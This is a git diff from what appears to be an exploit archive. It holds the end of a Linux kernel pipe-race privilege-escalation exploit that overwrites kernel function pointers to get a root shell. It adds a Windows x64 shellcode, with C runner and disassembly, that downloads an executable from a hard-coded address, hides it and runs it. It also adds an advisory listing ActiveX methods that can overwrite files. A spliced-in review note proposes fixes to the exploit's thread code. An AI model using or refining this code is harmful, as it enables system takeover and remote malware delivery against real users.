writers; + unsigned int waiting_writers; + unsigned int r_counter; + unsigned int w_counter; + void *fasync_readers; + void *fasync_writers; + void *inode; +}; + +struct pipe_inode_info2616orolder { + unsigned int spinlock; + /* + // if PREEMPT enabled + unsigned int break_lock; + // DEBUG_SPINLOCK + unsigned int magic, owner_cpu; + */ + void *owner; + void *next, *prev; + unsigned int nrbufs, curbuf; + struct pipe_buffer2616orolder bufs[PIPE_BUFFERS]; + void *tmp_page; + unsigned int start; + unsigned int readers; + unsigned int writers; + unsigned int waiting_writers; + unsigned int r_counter; + unsigned int w_counter; + void *fasync_readers; + void *fasync_writers; +}; + +struct fasync_struct { + int magic; + int fa_fd; + struct fasync_struct *fa_next; + void *file; +}; + +struct pipe_inode_info2610orolder { + /* this includes 2.4 kernels */ + unsigned long lock; // can be rw or spin + void *next, *prev; + char *base; + unsigned int len; + unsigned int start; + unsigned int readers; + unsigned int writers; + /* 2.4 only */ + unsigned int waiting_readers; + + unsigned int waiting_writers; + unsigned int r_counter; + unsigned int w_counter; + /* 2.6 only */ + struct fasync_struct *fasync_readers; + struct fasync_struct *fasync_writers; +}; + +int prepare(unsigned char *buf) +{ + struct pipe_inode_info2610orolder *info_oldest = (struct pipe_inode_info2610orolder *)buf; + struct pipe_inode_info2616orolder *info_older = (struct pipe_inode_info2616orolder *)buf; + struct pipe_inode_info2619orolder *info_old = (struct pipe_inode_info2619orolder *)buf; + struct pipe_inode_info2620ornewer *info_new = (struct pipe_inode_info2620ornewer *)buf; + struct pipe_buf_operations *ops = (struct pipe_buf_operations *)0x800; + int i; + int newver; + struct utsname unm; + + i = uname(&unm); + if (i != 0) { + printf("unable to get kernel version\n"); + exit(1); + } + + if (strlen(unm.release) >= 6 && unm.release[2] == '6' && unm.release[4] >= '2' && unm.release[5] >= '0' && 
unm.release[5] <= '9') { + fprintf(stdout, " [+] Using newer pipe_inode_info layout\n"); + newver = 3; + } else if (strlen(unm.release) >= 6 && unm.release[2] == '6' && unm.release[4] >= '1' && unm.release[5] >= '7' && unm.release[5] <= '9') { + fprintf(stdout, " [+] Using older pipe_inode_info layout\n"); + newver = 2; + } else if (strlen(unm.release) >= 5 && unm.release[2] == '6') { + fprintf(stdout, " [+] Using older-er pipe_inode_info layout\n"); + newver = 1; +// } else if (strlen(unm.release) >= 5 && unm.release[2] >= '4') { +// is_old_kernel = 1; +// newver = 0; + } else { + fprintf(stdout, " [+] This kernel is still vulnerable, but I can't be bothered to write the exploit. Write it yourself.\n"); + exit(1); + } + + /* for most of these what will happen is our write will + cause ops->confirm(/pin) to be called, which we've replaced + with own_the_kernel + for the 2.6.10->2.6.16 case it has no confirm/pin op, so what gets + called instead (repeatedly) is the release op + */ + if (newver == 3) { + /* uncomment for DEBUG_SPINLOCK */ + //info_new->magic = 0xdead4ead; + /* makes list_head empty for wake_up_common */ + info_new->next = &info_new->next; + info_new->readers = 1; + info_new->writers = 1; + info_new->nrbufs = 1; + info_new->curbuf = 1; + for (i = 0; i < PIPE_BUFFERS; i++) + info_new->bufs[i].ops = (void *)ops; + } else if (newver == 2) { + /* uncomment for DEBUG_SPINLOCK */ + //info_old->magic = 0xdead4ead; + /* makes list_head empty for wake_up_common */ + info_old->next = &info_old->next; + info_old->readers = 1; + info_old->writers = 1; + info_old->nrbufs = 1; + info_old->curbuf = 1; + for (i = 0; i < PIPE_BUFFERS; i++) + info_old->bufs[i].ops = (void *)ops; + } else if (newver == 1) { + /* uncomment for DEBUG_SPINLOCK */ + //info_older->magic = 0xdead4ead; + /* makes list_head empty for wake_up_common */ + info_older->next = &info_older->next; + info_older->readers = 1; + info_older->writers = 1; + info_older->nrbufs = 1; + info_older->curbuf = 1; 
+ /* we'll get called multiple times from free_pipe_info + but it's ok because own_the_kernel handles this case + */ + for (i = 0; i < PIPE_BUFFERS; i++) + info_older->bufs[i].ops = (void *)ops; + } else { + /* + different ballgame here, instead of being able to + provide a function pointer in the ops table, you + control a base address used to compute the address for + a copy into the kernel via copy_from_user. The + following should get you started. + */ + /* lookup symbol for writable fptr then trigger it later + change the main write in the one thread to write out + pointers with the value of exp_state->exploit_kernel + */ + info_oldest->base = (char *)0xc8000000; + info_oldest->readers = 1; + info_oldest->writers = 1; + return 0; + } + + ops->can_merge = 1; + for (i = 0; i < 16; i++) + ((void **)&ops->map)[i] = exp_state->own_the_kernel; + + return 0; +} + +int requires_null_page = 1; + +int get_exploit_state_ptr(struct exploit_state *ptr) +{ + exp_state = ptr; + return 0; +} + +int trigger(void) +{ + char buf[128]; + int fd; + int i = 0; + + /* ignore sigpipe so we don't bail out early */ + signal(SIGPIPE, SIG_IGN); + + start_thread(go_go_speed_racer, NULL); + + fprintf(stdout, " [+] We'll let this go for a while if needed...\n"); + fflush(stdout); + + while (!exp_state->got_ring0 && i < 10000000) { + fd = pipefd[1]; + sprintf(buf, "/proc/self/fd/%d", fd); + fd = open(buf, O_WRONLY | O_NONBLOCK); + if (fd >= 0) { + /* bust spinlock */ + *(unsigned int *)NULL = is_old_kernel ? 0 : 1; + write(fd, ".", 1); + close(fd); + } + i++; + } + + if (!exp_state->got_ring0) { + fprintf(stdout, " [+] Failed to trigger the vulnerability. Is this a single processor machine with CONFIG_PREEMPT_NONE=y?\n"); + return 0; + } + + return 1; +} + +int post(void) +{ +// return RUN_ROOTSHELL; + return FUNNY_PIC_AND_ROOTSHELL; +} \ No newline at end of file diff --git a/platforms/linux/local/744.c b/platforms/linux/local/744.c index ae479dec0..99cb9f69e 100755 
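Review bot: `start_thread` never checks the `malloc(0x4000)` result before deriving the child stack pointer from it, so an allocation failure becomes a crash inside `clone` rather than the "can't create thread" message the function already prints for the `tid < 0` case; add `if (!stack) { printf("can't create thread\n"); exit(1); }` before the `clone` call. `prepare` repeats the same `strlen(unm.release) >= N && unm.release[2] == '6'` test in three branches and then hard-codes one of several layout structs, while the file header says PREEMPT, LOCKBREAK and DEBUG_SPINLOCK change those layouts; a short comment on `prepare` stating that the chosen struct must be edited to match `/boot/config*` would put that dependency where a reader looks for it. The `is_old_kernel` assignment is commented out in `prepare` yet the flag is still consulted in `go_go_speed_racer` and `trigger`, so a comment noting that this path is dead in the current build would avoid confusion.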
--- a/platforms/linux/local/744.c
+++ b/platforms/linux/local/744.c
@@ -1,3 +1,7 @@
+/*
+* EDB Note: There's is an updated version ~ https://www.exploit-db.com/exploits/895/
+*/
+
 /*
 * binfmt_elf uselib VMA insert race vulnerability
 * v1.08
diff --git a/platforms/linux/local/778.c b/platforms/linux/local/778.c
index 8e26eab25..6b9906101 100755
--- a/platforms/linux/local/778.c
+++ b/platforms/linux/local/778.c
@@ -1,3 +1,7 @@
+/*
+* EDB Note: There's is an updated version ~ https://www.exploit-db.com/exploits/895/
+*/
+
 /*
 * Linux kernel 2.4 uselib() privilege elevation exploit.
 *
diff --git a/platforms/win_x86-64/shellcode/40821.c b/platforms/win_x86-64/shellcode/40821.c
new file mode 100755
index 000000000..14c806d5c
--- /dev/null
+++ b/platforms/win_x86-64/shellcode/40821.c
@@ -0,0 +1,332 @@ +/* + + # Title : Windows x64 Download+Execute Shellcode + # Author : Roziul Hasan Khan Shifat + # Date : 24-11-2016 + # size : 358 bytes + # Tested on : Windows 7 x64 Professional + # Email : shifath12@gmail.com + + + + +*/ + + + + +/* + + +section .text + global _start +_start: + + +;----------------------------- + +sub rsp,88 + +lea r14,[rsp] +sub rsp,88 + + +;------------------------------------------------ + + +xor rdx,rdx +mov rax,[gs:rdx+0x60] ;PEB +mov rsi,[rax+0x18] ;PEB.Ldr +mov rsi,[rsi+0x10] ;PEB.Ldr->InMemOrderModuleList +lodsq +mov rsi,[rax] +mov rdi,[rsi+0x30] ;kernel32.dll base address + +;--------------------------------------------------- + + +mov ebx,[rdi+0x3c] ;elf_anew +add rbx,rdi +mov dl,0x88 +mov ebx,[rbx+rdx] +add rbx,rdi + +mov esi,[rbx+0x1c] +add rsi,rdi +;-------------------------------------------------- + +;loading urlmon.dll + +mov dx,831 +mov ebx,[rsi+rdx*4] +add rbx,rdi + +xor rdx,rdx + + +mov [r14],dword 'urlm' +mov [r14+4],word 'on' +mov [r14+6],byte dl + +lea rcx,[r14] + + + +call rbx + + +mov dx,586 +mov ebx,[rsi+rdx*4] +add rbx,rdi + +xor rdx,rdx + +mov rcx,'URLDownl' +mov [r14],rcx +mov rcx,'oadToFil' +mov [r14+8],rcx +mov [r14+16],word 'eA' +mov [r14+18],byte dl + + +lea rdx,[r14] +mov rcx,rax + +call rbx +;;;;;;;;;;;;;;;;;;;;;;------------------------------------- + +mov r15,rax + +;------------------------------------------------ +;save as 'C:\\Users\\Public\\p.exe' length: 24+1 + +mov rax,'C:\\User' +mov [r14],rax +mov rax,'s\\Publi' +mov [r14+8],rax +mov rax,'c\\p.exe' +mov [r14+16],rax + +xor rdx,rdx +mov [r14+24],byte dl + + +;---------------------------------------- + + +lea rcx,[r14+25] + + +;url "http://192.168.10.129/pl.exe" length: 28+1 + +mov rax,'http://1' +mov [rcx],rax +mov rax,'92.168.1' +mov [rcx+8],rax +mov rax,'0.129/pl' +mov [rcx+16],rax +mov [rcx+24],dword '.exe' +mov [rcx+28],byte dl + + +;--------------------------------------------------- + +sub rsp,88 + + +download: +xor rcx,rcx +lea 
rdx,[r14+25] +lea r8,[r14] +xor r9,r9 +mov [rsp+32],r9 + +call r15 + +xor rdx,rdx +cmp rax,rdx +jnz download + + + +;------------------------------------------------ +sub rsp,88 +;----------------------------------------------- +;hiding file + + + + +mov dx,1131 +mov ebx,[rsi+rdx*4] +add rbx,rdi ;SetFileAttributesA() + + +lea rcx,[r14] +xor rdx,rdx +mov dl,2 + +call rbx + +;------------------------------------ +;executing file +xor rdx,rdx +mov dx,1314 +mov ebx,[rsi+rdx*4] +add rbx,rdi ;WinExec() + + +lea rcx,[r14] + +xor rdx,rdx + + + +call rbx + + +;------------------------------ +xor rdx,rdx +mov dx,296 +mov ebx,[rsi+rdx*4] +add rbx,rdi + +;--------------------------------------- + +;if U use this shellcode for pe injection, then don't forget to free allocated space + +add rsp,88 +xor rcx,rcx +call rbx + + +*/ + +/* + + +Disassembly of section .text: + +0000000000000000 <_start>: + 0: 48 83 ec 58 sub $0x58,%rsp + 4: 4c 8d 34 24 lea (%rsp),%r14 + 8: 48 83 ec 58 sub $0x58,%rsp + c: 48 31 d2 xor %rdx,%rdx + f: 65 48 8b 42 60 mov %gs:0x60(%rdx),%rax + 14: 48 8b 70 18 mov 0x18(%rax),%rsi + 18: 48 8b 76 10 mov 0x10(%rsi),%rsi + 1c: 48 ad lods %ds:(%rsi),%rax + 1e: 48 8b 30 mov (%rax),%rsi + 21: 48 8b 7e 30 mov 0x30(%rsi),%rdi + 25: 8b 5f 3c mov 0x3c(%rdi),%ebx + 28: 48 01 fb add %rdi,%rbx + 2b: b2 88 mov $0x88,%dl + 2d: 8b 1c 13 mov (%rbx,%rdx,1),%ebx + 30: 48 01 fb add %rdi,%rbx + 33: 8b 73 1c mov 0x1c(%rbx),%esi + 36: 48 01 fe add %rdi,%rsi + 39: 66 ba 3f 03 mov $0x33f,%dx + 3d: 8b 1c 96 mov (%rsi,%rdx,4),%ebx + 40: 48 01 fb add %rdi,%rbx + 43: 48 31 d2 xor %rdx,%rdx + 46: 41 c7 06 75 72 6c 6d movl $0x6d6c7275,(%r14) + 4d: 66 41 c7 46 04 6f 6e movw $0x6e6f,0x4(%r14) + 54: 41 88 56 06 mov %dl,0x6(%r14) + 58: 49 8d 0e lea (%r14),%rcx + 5b: ff d3 callq *%rbx + 5d: 66 ba 4a 02 mov $0x24a,%dx + 61: 8b 1c 96 mov (%rsi,%rdx,4),%ebx + 64: 48 01 fb add %rdi,%rbx + 67: 48 31 d2 xor %rdx,%rdx + 6a: 48 b9 55 52 4c 44 6f movabs $0x6c6e776f444c5255,%rcx + 71: 77 6e 6c + 74: 49 89 
0e mov %rcx,(%r14)
+ 77: 48 b9 6f 61 64 54 6f movabs $0x6c69466f5464616f,%rcx
+ 7e: 46 69 6c
+ 81: 49 89 4e 08 mov %rcx,0x8(%r14)
+ 85: 66 41 c7 46 10 65 41 movw $0x4165,0x10(%r14)
+ 8c: 41 88 56 12 mov %dl,0x12(%r14)
+ 90: 49 8d 16 lea (%r14),%rdx
+ 93: 48 89 c1 mov %rax,%rcx
+ 96: ff d3 callq *%rbx
+ 98: 49 89 c7 mov %rax,%r15
+ 9b: 48 b8 43 3a 5c 5c 55 movabs $0x726573555c5c3a43,%rax
+ a2: 73 65 72
+ a5: 49 89 06 mov %rax,(%r14)
+ a8: 48 b8 73 5c 5c 50 75 movabs $0x696c6275505c5c73,%rax
+ af: 62 6c 69
+ b2: 49 89 46 08 mov %rax,0x8(%r14)
+ b6: 48 b8 63 5c 5c 70 2e movabs $0x6578652e705c5c63,%rax
+ bd: 65 78 65
+ c0: 49 89 46 10 mov %rax,0x10(%r14)
+ c4: 48 31 d2 xor %rdx,%rdx
+ c7: 41 88 56 18 mov %dl,0x18(%r14)
+ cb: 49 8d 4e 19 lea 0x19(%r14),%rcx
+ cf: 48 b8 68 74 74 70 3a movabs $0x312f2f3a70747468,%rax
+ d6: 2f 2f 31
+ d9: 48 89 01 mov %rax,(%rcx)
+ dc: 48 b8 39 32 2e 31 36 movabs $0x312e3836312e3239,%rax
+ e3: 38 2e 31
+ e6: 48 89 41 08 mov %rax,0x8(%rcx)
+ ea: 48 b8 30 2e 31 32 39 movabs $0x6c702f3932312e30,%rax
+ f1: 2f 70 6c
+ f4: 48 89 41 10 mov %rax,0x10(%rcx)
+ f8: c7 41 18 2e 65 78 65 movl $0x6578652e,0x18(%rcx)
+ ff: 88 51 1c mov %dl,0x1c(%rcx)
+ 102: 48 83 ec 58 sub $0x58,%rsp
+
+0000000000000106 :
+ 106: 48 31 c9 xor %rcx,%rcx
+ 109: 49 8d 56 19 lea 0x19(%r14),%rdx
+ 10d: 4d 8d 06 lea (%r14),%r8
+ 110: 4d 31 c9 xor %r9,%r9
+ 113: 4c 89 4c 24 20 mov %r9,0x20(%rsp)
+ 118: 41 ff d7 callq *%r15
+ 11b: 48 31 d2 xor %rdx,%rdx
+ 11e: 48 39 d0 cmp %rdx,%rax
+ 121: 75 e3 jne 106
+ 123: 48 83 ec 58 sub $0x58,%rsp
+ 127: 66 ba 6b 04 mov $0x46b,%dx
+ 12b: 8b 1c 96 mov (%rsi,%rdx,4),%ebx
+ 12e: 48 01 fb add %rdi,%rbx
+ 131: 49 8d 0e lea (%r14),%rcx
+ 134: 48 31 d2 xor %rdx,%rdx
+ 137: b2 02 mov $0x2,%dl
+ 139: ff d3 callq *%rbx
+ 13b: 48 31 d2 xor %rdx,%rdx
+ 13e: 66 ba 22 05 mov $0x522,%dx
+ 142: 8b 1c 96 mov (%rsi,%rdx,4),%ebx
+ 145: 48 01 fb add %rdi,%rbx
+ 148: 49 8d 0e lea (%r14),%rcx
+ 14b: 48 31 d2 xor %rdx,%rdx
+ 14e: ff d3 callq *%rbx
+ 150: 48 31 d2 xor %rdx,%rdx
+ 153: 66 ba 28 01 mov $0x128,%dx
+ 157: 8b 1c 96 mov (%rsi,%rdx,4),%ebx
+ 15a: 48 01 fb add %rdi,%rbx
+ 15d: 48 83 c4 58 add $0x58,%rsp
+ 161: 48 31 c9 xor %rcx,%rcx
+ 164: ff d3 callq *%rbx
+
+*/
+
+#include
+#include
+#include
+
+
+char shellcode[]=\
+
+"\x48\x83\xec\x58\x4c\x8d\x34\x24\x48\x83\xec\x58\x48\x31\xd2\x65\x48\x8b\x42\x60\x48\x8b\x70\x18\x48\x8b\x76\x10\x48\xad\x48\x8b\x30\x48\x8b\x7e\x30\x8b\x5f\x3c\x48\x01\xfb\xb2\x88\x8b\x1c\x13\x48\x01\xfb\x8b\x73\x1c\x48\x01\xfe\x66\xba\x3f\x03\x8b\x1c\x96\x48\x01\xfb\x48\x31\xd2\x41\xc7\x06\x75\x72\x6c\x6d\x66\x41\xc7\x46\x04\x6f\x6e\x41\x88\x56\x06\x49\x8d\x0e\xff\xd3\x66\xba\x4a\x02\x8b\x1c\x96\x48\x01\xfb\x48\x31\xd2\x48\xb9\x55\x52\x4c\x44\x6f\x77\x6e\x6c\x49\x89\x0e\x48\xb9\x6f\x61\x64\x54\x6f\x46\x69\x6c\x49\x89\x4e\x08\x66\x41\xc7\x46\x10\x65\x41\x41\x88\x56\x12\x49\x8d\x16\x48\x89\xc1\xff\xd3\x49\x89\xc7\x48\xb8\x43\x3a\x5c\x5c\x55\x73\x65\x72\x49\x89\x06\x48\xb8\x73\x5c\x5c\x50\x75\x62\x6c\x69\x49\x89\x46\x08\x48\xb8\x63\x5c\x5c\x70\x2e\x65\x78\x65\x49\x89\x46\x10\x48\x31\xd2\x41\x88\x56\x18\x49\x8d\x4e\x19\x48\xb8\x68\x74\x74\x70\x3a\x2f\x2f\x31\x48\x89\x01\x48\xb8\x39\x32\x2e\x31\x36\x38\x2e\x31\x48\x89\x41\x08\x48\xb8\x30\x2e\x31\x32\x39\x2f\x70\x6c\x48\x89\x41\x10\xc7\x41\x18\x2e\x65\x78\x65\x88\x51\x1c\x48\x83\xec\x58\x48\x31\xc9\x49\x8d\x56\x19\x4d\x8d\x06\x4d\x31\xc9\x4c\x89\x4c\x24\x20\x41\xff\xd7\x48\x31\xd2\x48\x39\xd0\x75\xe3\x48\x83\xec\x58\x66\xba\x6b\x04\x8b\x1c\x96\x48\x01\xfb\x49\x8d\x0e\x48\x31\xd2\xb2\x02\xff\xd3\x48\x31\xd2\x66\xba\x22\x05\x8b\x1c\x96\x48\x01\xfb\x49\x8d\x0e\x48\x31\xd2\xff\xd3\x48\x31\xd2\x66\xba\x28\x01\x8b\x1c\x96\x48\x01\xfb\x48\x83\xc4\x58\x48\x31\xc9\xff\xd3";
+
+int main()
+{
+int len=strlen(shellcode);
+DWORD l=0;
+printf("shellcode length : %d\n",len);
+VirtualProtect(shellcode,len,PAGE_EXECUTE_READWRITE,&l);
+(* (int(*)()) shellcode)();
+
+return 0;
+
+}
diff --git a/platforms/windows/dos/40820.txt b/platforms/windows/dos/40820.txt
new file mode 100755
index 000000000..85d7b6dc8
--- /dev/null
+++ b/platforms/windows/dos/40820.txt
@@ -0,0 +1,329 @@
+UCanCode multiple vulnerabilities
+
+Url: http://www.hmi-software.com/
+ http://www.ucancode.net/index.htm
+ http://www.ucancode.net/bbs/zhuce/login.htm
+
+Description: Form vendor's web page "UCanCode Software is a Market Leading provider of HMI & SCADA, CAD, UML, GIS, Vector Graphics
+ and Real Time Data Visualization Graphics Source Code Kits for C/C++ and .NET software developers more than 40 countries
+ around the world!"
+ Great... 40 countries. It's time to take a look to their software!
+ Package name "UCanCode_Controls.zip"
+ After the installation, we can found these activex controls:
+
+ ---------------------------------------------
+ ProgID: UCCVIEWER.UCCViewerCtrl.1
+ CLSID: {3B7B3C36-8515-4E15-BC46-D1BEBA2F360C}
+ ---------------------------------------------
+ ProgID: UCCDRAW.UCCDrawCtrl.1
+ CLSID: {4B5BEE59-EDD2-4082-A9F7-D65E1CA20FA7}
+ ---------------------------------------------
+ progID: TKDRAWCAD.TKDrawCADCtrl.1
+ CLSID: {9022B790-B810-45B4-80BC-2D94EEC5343C}
+ ---------------------------------------------
+ ProgID: UCCPRINT.UCCPrintCtrl.1
+ CLSID: {A4FCBD44-6BF5-405C-9598-C8E8ADCE4488}
+ ---------------------------------------------
+ ProgID: UCCDIAGRAM.UCCDiagramCtrl.1
+ CLSID: {B6A3BF2C-F770-4182-BE7F-103BF2C76826}
+ ---------------------------------------------
+ ProgID: UCCUML.UCCUMLCtrl.1
+ CLSID: {C1F0EE85-363F-483D-97D0-87E2A537BFBA}
+ ---------------------------------------------
+ ProgID: UCCHMI.UCCHMICtrl.1
+ CLSID: {EDBBC1DC-58B2-4404-85FD-F9B1C05D96EF}
+ ---------------------------------------------
+ ProgID: UCCSIMPLE.UCCSIMPLECtrl.1
+ CLSID: {EF3AAE34-E60A-11E1-9656-00FF8A2F9C5B}
+ ---------------------------------------------
+ and all are marked as: RegKey Safe for Script: True
+ RegKey Safe for Init: True
+ Implements IObjectSafety: False
+
+Author: shinnai
+mail: shinnai[at]autistici[dot]org
+site: http://www.shinnai.altervista.org/
+---------------------------------------------------------------------
+INSECURE METHODS:
+In these coontrols there are a lot of insecure methods which can be used to overwrite
+arbitrary files in user's pc. This is the complete list:
+
+1) various Export* methods
+
+Library: UCCSIMPLELib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCSIM~1.OCX
+Class: UCCSIMPLE {EF3AAE34-E60A-11E1-9656-00FF8A2F9C5B}
+Sub ExportAsBitmapFile (ByVal strFile As String)
+----------------------------------------
+Library: UCCSIMPLELib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCSIM~1.OCX
+Class: UCCSIMPLE {EF3AAE34-E60A-11E1-9656-00FF8A2F9C5B}
+Sub ExportAsEMFFile (ByVal strFile As String)
+----------------------------------------
+Library: UCCHMILib - C:\PROGRA~1\UCANCO~1\UCANCO~1\HMI_OCX\UCCHMI.ocx
+Class: UCCHMI {EDBBC1DC-58B2-4404-85FD-F9B1C05D96EF}
+Sub ExportAsBitmapFile (ByVal strFile As String)
+----------------------------------------
+Library: UCCHMILib - C:\PROGRA~1\UCANCO~1\UCANCO~1\HMI_OCX\UCCHMI.ocx
+Class: UCCHMI {EDBBC1DC-58B2-4404-85FD-F9B1C05D96EF}
+Sub ExportAsEMFFile (ByVal strFile As String)
+----------------------------------------
+Library: UCCUMLLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCUML.ocx
+Class: UCCUML {C1F0EE85-363F-483D-97D0-87E2A537BFBA}
+Sub ExportAsBitmapFile (ByVal strFile As String)
+----------------------------------------
+Library: UCCUMLLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCUML.ocx
+Class: UCCUML {C1F0EE85-363F-483D-97D0-87E2A537BFBA}
+Sub ExportAsEMFFile (ByVal strFile As String)
+----------------------------------------
+Library: UCCUMLLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCUML.ocx
+Class: UCCUML {C1F0EE85-363F-483D-97D0-87E2A537BFBA}
+Function ExportBitmapData (ByRef phBlob As Long, ByVal imageShape As Long) As Boolean
+----------------------------------------
+Library: UCCDIAGRAMLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCDIA~1.OCX
+Class: UCCDiagram {B6A3BF2C-F770-4182-BE7F-103BF2C76826}
+Sub ExportAsBitmapFile (ByVal strFile As String)
+----------------------------------------
+Library: UCCDIAGRAMLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCDIA~1.OCX
+Class: UCCDiagram {B6A3BF2C-F770-4182-BE7F-103BF2C76826}
+Sub ExportAsEMFFile (ByVal strFile As String)
+----------------------------------------
+Library: UCCPRINTLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCPrint.ocx
+Class: UCCPrint {A4FCBD44-6BF5-405C-9598-C8E8ADCE4488}
+Sub ExportAsBitmapFile (ByVal strFile As String)
+----------------------------------------
+Library: UCCPRINTLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCPrint.ocx
+Class: UCCPrint {A4FCBD44-6BF5-405C-9598-C8E8ADCE4488}
+Sub ExportAsEMFFile (ByVal strFile As String)
+----------------------------------------
+Library: TKDRAWCADLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\TKDRAW~1.OCX
+Class: TKDrawCAD {9022B790-B810-45B4-80BC-2D94EEC5343C}
+Sub ExportAsBitmapFile (ByVal strFile As String)
+----------------------------------------
+Library: TKDRAWCADLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\TKDRAW~1.OCX
+Class: TKDrawCAD {9022B790-B810-45B4-80BC-2D94EEC5343C}
+Sub ExportAsEMFFile (ByVal strFile As String)
+----------------------------------------
+Library: UCCDRAWLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCDraw.ocx
+Class: UCCDraw {4B5BEE59-EDD2-4082-A9F7-D65E1CA20FA7}
+Sub ExportAsBitmapFile (ByVal strFile As String)
+----------------------------------------
+Library: UCCDRAWLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCDraw.ocx
+Class: UCCDraw {4B5BEE59-EDD2-4082-A9F7-D65E1CA20FA7}
+Sub ExportAsEMFFile (ByVal strFile As String)
+----------------------------------------
+Library: UCCDRAWLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCDraw.ocx
+Class: UCCDraw {4B5BEE59-EDD2-4082-A9F7-D65E1CA20FA7}
+Function ExportToBitmapFile (ByVal lpszFile As String) As Boolean
+----------------------------------------
+Library: UCCVIEWERLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCVIE~1.OCX
+Class: UCCViewer {3B7B3C36-8515-4E15-BC46-D1BEBA2F360C}
+Sub ExportAsBitmapFile (ByVal strFile As String)
+----------------------------------------
+Library: UCCVIEWERLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCVIE~1.OCX
+Class: UCCViewer {3B7B3C36-8515-4E15-BC46-D1BEBA2F360C}
+Sub ExportAsEMFFile (ByVal strFile As String)
+----------------------------------------
+
+2) various Save* methods:
+
+----------------------------------------
+Library: UCCSIMPLELib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCSIM~1.OCX
+Class: UCCSIMPLE {EF3AAE34-E60A-11E1-9656-00FF8A2F9C5B}
+Function SaveMemory2 (ByVal filename As String, ByVal pData As Long, ByVal nSize As Long) As Boolean
+----------------------------------------
+Library: UCCHMILib - C:\PROGRA~1\UCANCO~1\UCANCO~1\HMI_OCX\UCCHMI.ocx
+Class: UCCHMI {EDBBC1DC-58B2-4404-85FD-F9B1C05D96EF}
+Function SaveMemory2 (ByVal filename As String, ByVal pData As Long, ByVal nSize As Long) As Boolean
+----------------------------------------
+Library: UCCUMLLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCUML.ocx
+Class: UCCUML {C1F0EE85-363F-483D-97D0-87E2A537BFBA}
+Function SaveMemory2 (ByVal filename As String, ByVal pData As Long, ByVal nSize As Long) As Boolean
+----------------------------------------
+Library: UCCDIAGRAMLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCDIA~1.OCX
+Class: UCCDiagram {B6A3BF2C-F770-4182-BE7F-103BF2C76826}
+Function SaveMemory2 (ByVal filename As String , ByVal pData As Long , ByVal nSize As Long) As Boolean
+----------------------------------------
+Library: UCCDIAGRAMLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCDIA~1.OCX
+Class: UCCDiagram {B6A3BF2C-F770-4182-BE7F-103BF2C76826}
+Sub SaveToXdgFile (ByVal lpszFileName As String)
+----------------------------------------
+Library: UCCDIAGRAMLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCDIA~1.OCX
+Class: UCCDiagram {B6A3BF2C-F770-4182-BE7F-103BF2C76826}
+Function SaveTemplateToFile (ByVal strFile As String) As Boolean
+----------------------------------------
+Library: UCCPRINTLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCPrint.ocx
+Class: UCCPrint {A4FCBD44-6BF5-405C-9598-C8E8ADCE4488}
+Function SaveMemory2 (ByVal filename As String , ByVal pData As Long , ByVal nSize As Long) As Boolean
+----------------------------------------
+Library: UCCPRINTLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCPrint.ocx
+Class: UCCPrint {A4FCBD44-6BF5-405C-9598-C8E8ADCE4488}
+Sub SaveToXdgFile (ByVal lpszFileName As String)
+----------------------------------------
+Library: UCCPRINTLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCPrint.ocx
+Class: UCCPrint {A4FCBD44-6BF5-405C-9598-C8E8ADCE4488}
+Function SaveTemplateToFile (ByVal strFile As String) As Boolean
+----------------------------------------
+Library: TKDRAWCADLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\TKDRAW~1.OCX
+Class: TKDrawCAD {9022B790-B810-45B4-80BC-2D94EEC5343C}
+Function SaveMemory2 (ByVal filename As String , ByVal pData As Long , ByVal nSize As Long) As Boolean
+----------------------------------------
+Library: TKDRAWCADLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\TKDRAW~1.OCX
+Class: TKDrawCAD {9022B790-B810-45B4-80BC-2D94EEC5343C}
+Sub SaveToXdgFile (ByVal lpszFileName As String)
+----------------------------------------
+Library: TKDRAWCADLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\TKDRAW~1.OCX
+Class: TKDrawCAD {9022B790-B810-45B4-80BC-2D94EEC5343C}
+Function SaveTemplateToFile (ByVal strFile As String) As Boolean
+----------------------------------------
+Library: UCCDRAWLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCDraw.ocx
+Class: UCCDraw {4B5BEE59-EDD2-4082-A9F7-D65E1CA20FA7}
+Function SaveMemory2 (ByVal filename As String, ByVal pData As Long, ByVal nSize As Long) As Boolean
+----------------------------------------
+Library: UCCDRAWLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCDraw.ocx
+Class: UCCDraw {4B5BEE59-EDD2-4082-A9F7-D65E1CA20FA7}
+Function SaveDocument (ByVal lpszFileName As String) As Boolean
+----------------------------------------
